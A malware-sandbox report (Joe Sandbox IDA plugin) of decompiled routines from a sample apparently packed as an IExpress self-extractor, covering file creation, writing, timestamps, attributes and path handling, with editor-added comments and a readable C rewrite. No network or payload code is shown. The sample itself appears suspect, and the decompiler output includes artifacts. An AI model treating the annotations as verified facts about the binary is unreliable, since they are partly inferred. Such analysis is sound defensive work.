                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                    						_t30 = E00194C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						E00194B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                    						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                    						__eflags = _t50;
                                                                                                                                                                                                                                    						if(_t50 != 0) {
                                                                                                                                                                                                                                    							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                    							__eflags = _t51;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t51 = 0x80;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t33 = 1;
                                                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t30 = _t44 - 1;
                                                                                                                                                                                                                                    					__eflags = _t30;
                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_a4 == 3) {
                                                                                                                                                                                                                                    					_t30 = E00194B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L3;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x00194dd2
                                                                                                                                                                                                                                    0x00194ddd
                                                                                                                                                                                                                                    0x00194ddd
                                                                                                                                                                                                                                    0x00194de3
                                                                                                                                                                                                                                    0x00194de8
                                                                                                                                                                                                                                    0x00194ded
                                                                                                                                                                                                                                    0x00194ded
                                                                                                                                                                                                                                    0x00194def
                                                                                                                                                                                                                                    0x00194df0
                                                                                                                                                                                                                                    0x00194df0
                                                                                                                                                                                                                                    0x00194df4
                                                                                                                                                                                                                                    0x00194df4
                                                                                                                                                                                                                                    0x00194df6
                                                                                                                                                                                                                                    0x00194df9
                                                                                                                                                                                                                                    0x00194dfc
                                                                                                                                                                                                                                    0x00194dfc
                                                                                                                                                                                                                                    0x00194dfe
                                                                                                                                                                                                                                    0x00194dff
                                                                                                                                                                                                                                    0x00194dff
                                                                                                                                                                                                                                    0x00194e03
                                                                                                                                                                                                                                    0x00194e08
                                                                                                                                                                                                                                    0x00194e0a
                                                                                                                                                                                                                                    0x00194e0f
                                                                                                                                                                                                                                    0x00194d03
                                                                                                                                                                                                                                    0x00194d03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194d03
                                                                                                                                                                                                                                    0x00194e18
                                                                                                                                                                                                                                    0x00194e20
                                                                                                                                                                                                                                    0x00194e25
                                                                                                                                                                                                                                    0x00194e27
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194e33
                                                                                                                                                                                                                                    0x00194e38
                                                                                                                                                                                                                                    0x00194e3a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194e40
                                                                                                                                                                                                                                    0x00194e51
                                                                                                                                                                                                                                    0x00194e56
                                                                                                                                                                                                                                    0x00194e5b
                                                                                                                                                                                                                                    0x00194e5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194e6a
                                                                                                                                                                                                                                    0x00194e6f
                                                                                                                                                                                                                                    0x00194e71
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194e77
                                                                                                                                                                                                                                    0x00194e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194e7d
                                                                                                                                                                                                                                    0x00194d25
                                                                                                                                                                                                                                    0x00194d25
                                                                                                                                                                                                                                    0x00194d28
                                                                                                                                                                                                                                    0x00194d36
                                                                                                                                                                                                                                    0x00194d3b
                                                                                                                                                                                                                                    0x00194d40
                                                                                                                                                                                                                                    0x00194d40
                                                                                                                                                                                                                                    0x00194d42
                                                                                                                                                                                                                                    0x00194d43
                                                                                                                                                                                                                                    0x00194d43
                                                                                                                                                                                                                                    0x00194d47
                                                                                                                                                                                                                                    0x00194d4a
                                                                                                                                                                                                                                    0x00194d4a
                                                                                                                                                                                                                                    0x00194d4c
                                                                                                                                                                                                                                    0x00194d4f
                                                                                                                                                                                                                                    0x00194d4f
                                                                                                                                                                                                                                    0x00194d51
                                                                                                                                                                                                                                    0x00194d52
                                                                                                                                                                                                                                    0x00194d52
                                                                                                                                                                                                                                    0x00194d56
                                                                                                                                                                                                                                    0x00194d5b
                                                                                                                                                                                                                                    0x00194d5d
                                                                                                                                                                                                                                    0x00194d62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194d67
                                                                                                                                                                                                                                    0x00194d6f
                                                                                                                                                                                                                                    0x00194d74
                                                                                                                                                                                                                                    0x00194d76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194d7c
                                                                                                                                                                                                                                    0x00194d84
                                                                                                                                                                                                                                    0x00194d89
                                                                                                                                                                                                                                    0x00194d8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194d94
                                                                                                                                                                                                                                    0x00194d99
                                                                                                                                                                                                                                    0x00194d9e
                                                                                                                                                                                                                                    0x00194da1
                                                                                                                                                                                                                                    0x00194daa
                                                                                                                                                                                                                                    0x00194daa
                                                                                                                                                                                                                                    0x00194da3
                                                                                                                                                                                                                                    0x00194da3
                                                                                                                                                                                                                                    0x00194da3
                                                                                                                                                                                                                                    0x00194db5
                                                                                                                                                                                                                                    0x00194dbb
                                                                                                                                                                                                                                    0x00194dbd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194dc3
                                                                                                                                                                                                                                    0x00194dc5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194dc5
                                                                                                                                                                                                                                    0x00194dbd
                                                                                                                                                                                                                                    0x00194d2a
                                                                                                                                                                                                                                    0x00194d2a
                                                                                                                                                                                                                                    0x00194d2d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194d2d
                                                                                                                                                                                                                                    0x00194cf8
                                                                                                                                                                                                                                    0x00194cfd
                                                                                                                                                                                                                                    0x00194d02
                                                                                                                                                                                                                                    0x00000000

APIs
• SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00194DB5
• SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00194DDD
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                    • API String ID: 3625706803-256195474
                                                                                                                                                                                                                                    • Opcode ID: 264027f27941b3f3c470f28ff1f14bf93946e18fe24e8dc8ffe207034b46de15
                                                                                                                                                                                                                                    • Instruction ID: bd479e5f6730576322e1d67244e5b17d3ac4001bcddeda325acf5e7a222b558b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 264027f27941b3f3c470f28ff1f14bf93946e18fe24e8dc8ffe207034b46de15
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A941213A2001058BCF259FB8DD44EB673E5FF65344F044669E882A7685DB31EE8BC790
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00194C37(signed int __ecx, int __edx, int _a4) {
	struct _FILETIME _v12;
	struct _FILETIME _v20;
	FILETIME* _t14;
	int _t15;
	signed int _t21;

	_t21 = __ecx * 0x18;
	if( *((intOrPtr*)(_t21 + 0x198d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
		L5:
		return 0;
	} else {
		_t14 =  &_v12;
		_t15 = SetFileTime( *(_t21 + 0x198d74), _t14, _t14, _t14); // executed
		if(_t15 == 0) {
			goto L5;
		}
		return 1;
	}
}

0x00194c40
0x00194c4a
0x00194c8d
0x00000000
0x00194c70
0x00194c70
0x00194c7e
0x00194c86
0x00000000
0x00000000
0x00000000
0x00194c8a

APIs
• DosDateTimeToFileTime.KERNEL32 ref: 00194C54
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00194C66
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00194C7E
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Time$File$DateLocal
• String ID:
• API String ID: 2071732420-0
• Opcode ID: 132bcb74f43d67d3e2b11bd4f956ecee3ac744910a0b49d756badee10b31632c
• Instruction ID: c45aa7d77212b497351dff85e8d0ed6edb108757cb545861f39f602706e3cdb2
• Opcode Fuzzy Hash: 132bcb74f43d67d3e2b11bd4f956ecee3ac744910a0b49d756badee10b31632c
• Instruction Fuzzy Hash: 3FF0907261120CAFAF24DFB4CC49DBB77ECEB04250B44053BA815C1150EB30D959C7A2
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
E0019487A(CHAR* __ecx, signed int __edx) {
	void* _t7;
	CHAR* _t11;
	long _t18;
	long _t23;

	_t11 = __ecx;
	asm("sbb edi, edi");
	_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
	if((__edx & 0x00000100) == 0) {
		asm("sbb esi, esi");
		_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
	} else {
		if((__edx & 0x00000400) == 0) {
			asm("sbb esi, esi");
			_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
		} else {
			_t23 = 1;
		}
	}
	_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
	if(_t7 != 0xffffffff || _t23 == 3) {
		return _t7;
	} else {
		E0019490C(_t11);
		return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
	}
}

                                                                                                                                                                                                                                    0x00194880
                                                                                                                                                                                                                                    0x0019488c
                                                                                                                                                                                                                                    0x00194894
                                                                                                                                                                                                                                    0x001948a0
                                                                                                                                                                                                                                    0x001948c9
                                                                                                                                                                                                                                    0x001948ce
                                                                                                                                                                                                                                    0x001948a2
                                                                                                                                                                                                                                    0x001948a8
                                                                                                                                                                                                                                    0x001948b7
                                                                                                                                                                                                                                    0x001948bc
                                                                                                                                                                                                                                    0x001948aa
                                                                                                                                                                                                                                    0x001948ac
                                                                                                                                                                                                                                    0x001948ac
                                                                                                                                                                                                                                    0x001948a8
                                                                                                                                                                                                                                    0x001948de
                                                                                                                                                                                                                                    0x001948e7
                                                                                                                                                                                                                                    0x0019490b
                                                                                                                                                                                                                                    0x001948ee
                                                                                                                                                                                                                                    0x001948f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194902

APIs
• CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00194A23,?,00194F67,*MEMCAB,00008000,00000180), ref: 001948DE
• CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00194F67,*MEMCAB,00008000,00000180), ref: 00194902
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: b71614adbbfb9ea31a2498488af8c51abf3d97791076bd47ef5cfe850c1be30a
• Instruction ID: ccd188db88c58bff6cb503f20751c7e62f0630dcb25af713ccebf8ef933384e7
• Opcode Fuzzy Hash: b71614adbbfb9ea31a2498488af8c51abf3d97791076bd47ef5cfe850c1be30a
• Instruction Fuzzy Hash: DD0146A3E125702BF72440698C88FB7551CCB9A735F1B0335FDEAE76D2D6644C0682E0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E00194AD0(signed int _a4, void* _a8, long _a12) {
	signed int _t9;
	int _t12;
	signed int _t14;
	signed int _t15;
	void* _t20;
	struct HWND__* _t21;
	signed int _t24;
	signed int _t25;

	_t20 =  *0x19858c; // 0x268
	// Subcall 00193680 pumps the message queue (MsgWaitForMultipleObjects / PeekMessageA)
	// so the extraction dialog stays responsive while writing.
	_t9 = E00193680(_t20);
	if( *0x1991d8 == 0) { // global flag; when non-zero the write is skipped and -1 returned
		_push(_t24);
		// Output handle comes from a table with 0x18-byte entries, indexed by _a4.
		// _a12 is reused as lpNumberOfBytesWritten.
		_t12 = WriteFile( *(0x198d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
		if(_t12 != 0) {
			_t25 = _a12; // bytes actually written
			if(_t25 != 0xffffffff) {
				_t14 =  *0x199400; // 0x56200, running total of bytes written so far
				_t15 = _t14 + _t25;
				 *0x199400 = _t15;
				if( *0x198184 != 0) { // progress display enabled
					_t21 =  *0x198584; // 0x0, dialog window handle
					if(_t21 != 0) {
						// 0x402 is PBM_SETPOS: set progress-bar control 0x83a to written * 100 / total size (*0x1993f8)
						SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1993f8, 0);
					}
				}
			}
		} else {
			_t25 = _t24 | 0xffffffff; // WriteFile failed: return -1
		}
		return _t25;
	} else {
		return _t9 | 0xffffffff;
	}
}

APIs
  • Part of subcall function 00193680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0019369F
  • Part of subcall function 00193680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001936B2
  • Part of subcall function 00193680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001936DA
• WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00194B05
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: MessagePeek$FileMultipleObjectsWaitWrite
• String ID:
• API String ID: 1084409-0
• Opcode ID: 53ea7c6d81b9f421d94a1517fcb42bbd4ae295e1a14b9c77c5b01df681e8bf92
• Instruction ID: 31c1614584c65d3bdc582192767fad68faa61f8f16689c401735839c2c3e837d
• Opcode Fuzzy Hash: 53ea7c6d81b9f421d94a1517fcb42bbd4ae295e1a14b9c77c5b01df681e8bf92
• Instruction Fuzzy Hash: 0301B131200201ABEB148F68DC05FA67769FB44725F14832AF93A975F0CB70DC96CB81
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0019658A(char* __ecx, void* __edx, char* _a4) {
	intOrPtr _t4;
	char* _t6;
	char* _t8;
	void* _t10;
	void* _t12;
	char* _t16;
	intOrPtr* _t17;
	void* _t18;
	char* _t19;

	_t16 = __ecx; // destination buffer
	_t10 = __edx; // destination buffer size
	_t17 = __ecx;
	_t1 = _t17 + 1; // 0x198b3f
	_t12 = _t1;
	// Inline strlen: advance _t17 to the byte after the terminating NUL.
	do {
		_t4 =  *_t17;
		_t17 = _t17 + 1;
	} while (_t4 != 0);
	_t18 = _t17 - _t12; // current length of the string in __ecx
	_t2 = _t18 + 1; // 0x198b40
	// Only append when the string plus its terminator still fits in the buffer.
	if(_t2 < __edx) {
		_t19 = _t18 + __ecx; // append position: end of the existing string
                                                                                                                                                                                                                                    					if(_t19 > __ecx) {
                                                                                                                                                                                                                                    						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                    						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                    							 *_t19 = 0x5c;
                                                                                                                                                                                                                                    							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t6 = _a4;
                                                                                                                                                                                                                                    					 *_t19 = 0;
                                                                                                                                                                                                                                    					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                    						_t6 = _t6 + 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return E001916B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0x8007007a;
                                                                                                                                                                                                                                    			}












Instruction addresses for the listing above: 0x00196592 0x00196594 0x00196596 0x00198598 0x00196598 0x0019659b 0x0019659b 0x0019659d 0x0019659e 0x001965a2 0x001965a4 0x001965a9 0x001965b2 0x001965b6 0x001965ba 0x001965c3 0x001965c5 0x001965c8 0x001965c8 0x001965c3 0x001965c9 0x001965cc 0x001965d2 0x001965d1 0x001965d1 0x00000000 0x001965dc 0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharPrevA.USER32(00198B3E,00198B3F,00000001,00198B3E,-00000003,?,001960EC,00191140,?), ref: 001965BA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharPrev
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 122130370-0
                                                                                                                                                                                                                                    • Opcode ID: 29d0d67576ce1d33d6ba056a075633b839f656c5e1b8681f58f6eaef053b9ed5
                                                                                                                                                                                                                                    • Instruction ID: c0ee103f3a6a6a33d9889ac84323c82a4fcd81232d7e250e8192c5d9108f8e47
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29d0d67576ce1d33d6ba056a075633b839f656c5e1b8681f58f6eaef053b9ed5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF042325042505BFB35051D9884B76BFDD9B96390F26016FE8DEC3209CB555C46C3B4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%
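
The CharPrevA routine above, rewritten as readable C so the bounds check and separator handling can be followed. This is an added example, not code recovered from the sample: the subcall E001916B3 is not resolved on this page and is assumed here to be a bounded string append that also returns 0x8007007A (HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER)) when the component does not fit; the CharPrevA() DBCS-aware step-back is approximated by a single-byte look-back so the code runs off Windows. Function names, the status-code macros and the scenarios in self_check() are the editor's own.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* Status values used by the routine. These are the standard Win32/strsafe
   definitions; they are not taken from the sample. */
#define HR_S_OK                 0x00000000UL
#define HR_INSUFFICIENT_BUFFER  0x8007007AUL  /* HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER) */

/* Assumed stand-in for the unresolved subcall E001916B3: append `src` to `dst`
   within a capacity of `cch` bytes, refusing (and leaving `dst` terminated)
   when the result would not fit. */
static unsigned long bounded_append(char *dst, size_t cch, const char *src)
{
    size_t used = strlen(dst);
    size_t need = strlen(src);
    if (used + need + 1 > cch)                /* no room for src plus its NUL */
        return HR_INSUFFICIENT_BUFFER;
    memcpy(dst + used, src, need + 1);
    return HR_S_OK;
}

/* Readable form of the decompiled routine: __ecx = dst, __edx = cch, _a4 = component. */
unsigned long append_path_component(char *dst, size_t cch, const char *component)
{
    size_t len = strlen(dst);                 /* the inline do/while NUL scan */

    /* `if (len + 1 < cch)`: guarantees dst[len] and dst[len + 1] are inside the
       buffer, i.e. exactly enough for one separator plus the terminator. */
    if (len + 1 >= cch)
        return HR_INSUFFICIENT_BUFFER;

    char *end = dst + len;
    if (end > dst) {
        /* The sample calls CharPrevA(dst, end) so that a DBCS trail byte equal
           to 0x5c is not mistaken for a separator. Assumption here: single-byte
           code page, so the previous character is the previous byte. */
        if (end[-1] != '\\')
            *end++ = '\\';
    }
    *end = '\0';

    while (*component == ' ')                 /* the `while (*_t6 == 0x20)` loop */
        component++;

    return bounded_append(dst, cch, component);
}

/* Constructed scenarios (not from the report); returns how many behave as the
   decompiled logic predicts. */
int self_check(void)
{
    int ok = 0;

    char a[16] = "C:\\Windows";
    if (append_path_component(a, sizeof a, "  sys") == HR_S_OK &&
        strcmp(a, "C:\\Windows\\sys") == 0)
        ok++;                                 /* separator inserted, spaces skipped */

    char b[32] = "C:\\Temp\\";
    if (append_path_component(b, sizeof b, "x") == HR_S_OK &&
        strcmp(b, "C:\\Temp\\x") == 0)
        ok++;                                 /* existing separator not doubled */

    char c[8] = "";
    if (append_path_component(c, sizeof c, "a") == HR_S_OK && strcmp(c, "a") == 0)
        ok++;                                 /* empty dst: no leading separator */

    char d[4] = "abc";
    if (append_path_component(d, sizeof d, "x") == HR_INSUFFICIENT_BUFFER &&
        strcmp(d, "abc") == 0)
        ok++;                                 /* len + 1 == cch: rejected before any write */

    char e[8] = "ab";
    if (append_path_component(e, sizeof e, "abcdefgh") == HR_INSUFFICIENT_BUFFER &&
        strcmp(e, "ab\\") == 0)
        ok++;                                 /* separator written, then component refused */

    return ok;
}

int main(void)
{
    int passed = self_check();
    printf("%d/5 scenarios behaved as expected\n", passed);
    return passed == 5 ? 0 : 1;
}
```

The last scenario is the one worth noting when reading the original: the separator is written before the subcall runs its own length check, so a caller that ignores the 0x8007007A return is left with a buffer that already ends in a backslash.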

                                                                                                                                                                                                                                    C-Code - Quality: 93%
			E0019621E() {
				signed int _v8;                     // saved stack-cookie value
				char _v268;                         // 0x104-byte path buffer (MAX_PATH)
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x198004; // 0x21bd9a3c -- global cookie, matches the MSVC /GS pattern
				_v8 = _t5 ^ _t21;                   // cookie XOR frame pointer, stored below the buffer
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) { // 0x104 == MAX_PATH
					0x4f0 = 2;                      // decompiler artifact (store to a constant)
					_t9 = E0019597D( &_v268, 0x4f0, _t19, 0x4f0); // executed -- continues with the Windows directory path
				} else {
					E001944B9(0, 0x4f0, _t8, _t8, 0x10, _t8); // error dialog: LoadStringA + MessageBoxA, see APIs below
					 *0x199124 = E00196285();       // stores GetLastError() in a global
					_t9 = 0;
				}
				return E00196CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20); // cookie check on return (__security_check_cookie pattern)
			}

Instruction addresses for the listing above: 0x00196229 0x00196230 0x00196247 0x0019626a 0x00196272 0x00196249 0x00196255 0x0019625f 0x00196264 0x00196264 0x00196284

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0019623F
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                      • Part of subcall function 00196285: GetLastError.KERNEL32(00195BBC), ref: 00196285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 381621628-0
                                                                                                                                                                                                                                    • Opcode ID: b30c813a00e17a1608beaa7f4f09dc76bfe2090ed4fc7354f7fa2703307ef5be
                                                                                                                                                                                                                                    • Instruction ID: 68c16bdb20fab584b5369e24277ff8ef1ce7b7b9e1d652d15e35e545aeaa5961
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b30c813a00e17a1608beaa7f4f09dc76bfe2090ed4fc7354f7fa2703307ef5be
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54F05EB0604208ABEF50EB749D06FBE76A8DBA4700F40046AB986D6191EF749D8586A4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00194B60(signed int _a4) {
	signed int _t9;
	signed int _t15;

	// _a4 indexes a table of 0x18-byte entries based at 0x198d60 (as laid out by the decompiler)
	_t15 = _a4 * 0x18;
	if( *((intOrPtr*)(_t15 + 0x198d64)) != 1) {
		// Close the handle kept at entry+0x14. In Joe Sandbox listings this import name
		// usually stands in for CloseHandle, whose kernelbase export lands on the same code.
		_t9 = FindCloseChangeNotification( *(_t15 + 0x198d74)); // executed
		if(_t9 == 0) {
			return _t9 | 0xffffffff; // -1 when the close fails
		}
		*((intOrPtr*)(_t15 + 0x198d60)) = 1; // mark the entry as closed
		return 0;
	}
	// Entry flagged 1 at +4: reset its fields without closing a handle
	*((intOrPtr*)(_t15 + 0x198d60)) = 1;
	*((intOrPtr*)(_t15 + 0x198d68)) = 0;
	*((intOrPtr*)(_t15 + 0x198d70)) = 0;
	*((intOrPtr*)(_t15 + 0x198d6c)) = 0;
	return 0;
}

APIs
• FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00194FA1,00000000), ref: 00194B98
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
